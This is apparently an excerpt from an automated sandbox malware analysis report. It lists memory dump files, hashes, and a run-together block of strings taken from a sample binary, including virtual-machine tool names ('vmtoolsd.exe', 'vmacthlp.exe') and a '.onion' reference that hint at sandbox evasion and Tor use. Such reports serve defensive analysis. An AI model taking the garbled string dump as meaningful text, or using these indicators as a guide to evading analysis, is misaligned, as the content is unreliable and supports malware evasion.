                                                                                                                                                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000840000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000C77000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000CCF000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000CD3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000CEF000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000CF6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_VvPx7JMqkEvTJAQ2rPS2y2wf.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                                                                                                                                                                                              • API String ID: 0-3530339137
                                                                                                                                                                                                                                                              • Opcode ID: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%